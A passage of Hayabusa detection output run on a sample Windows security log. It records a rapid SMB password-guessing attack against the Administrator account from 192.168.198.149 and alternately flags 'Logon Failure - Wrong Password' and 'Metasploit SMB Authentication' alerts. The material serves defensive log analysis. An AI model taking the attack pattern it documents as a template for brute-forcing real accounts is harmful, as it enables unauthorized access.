Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AUeUmYa72BzHfyhK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ksydur7W1mUoOZAE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YNIzopnsXH6OjcUs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.261 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SQljJkaWs8bcaOI1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.296 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1jejn6ZMo564m7ok : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KrpBO1SCHpt27CRM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.440 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ifPePsozBYRLCU3k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vve4r8QwaMLKrrcX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.521 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i9ArElR5k8yLefWu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.569 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4a1Y126C516BaGcz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VL7PnrO2dLsEbebQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.652 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GGTlLZ8J9f2PtiuL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.686 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6sVwPFs7bhJgJwRt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dgQNHL9etdHdRw9Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.772 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mjZrWpJlN2CwbxFc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 72lmrp6neWGKAURB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.858 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CnTi5dgoWunYutJ9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.896 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Vi2fTl07llsJEYyt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.936 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hohh8KS1eYtojEya : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.980 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.020 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RsuC8F95UmsOSKvs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.020 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: be8UJ0EN7XS5r0b6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.064 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CgJlVYanwWKAhJ7O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zthqCIkr1nKtqcCj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tzmi8I402j71q5Wg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.200 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m0U3NYl8QEbgeJry : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.244 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uJJ1FOUIBInGkKPQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.277 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bu0X5RisszAHEs0X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ZZfs8zqT2bLOAHq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.370 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qkpO31LzJfaYLyjB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.409 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.461 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BJrIsRTWUwPuySR7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.461 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.503 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VHNccqtwl9Y9IhLq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.503 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: APlvDcMzvms0gehT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.536 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AxOERGKI75RarVNZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.585 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uvzwd5qqC7og49yW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.662 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lksm3o2g0YhFnm4Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.662 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zwXhSPCV4qHVF9Rc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z31baZ4G36idFMeX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WK63qylKunHZB3zS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.784 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ALJxKGwyZz7JDpRg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.816 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q8tioTO3TEIzdzY0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.862 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5dIKTgQkvPKzKJoZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.905 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ta0IMrlArbgONhDG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.947 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MKNUu4624Rvr87kK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.985 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n7jIL2FkXzWqvWTJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.032 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oJMVh1zdQt7EikVj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.076 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.113 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5OqvximSAPlXZ3An : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.113 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tr2GQ1F3jccpWrsm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.160 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 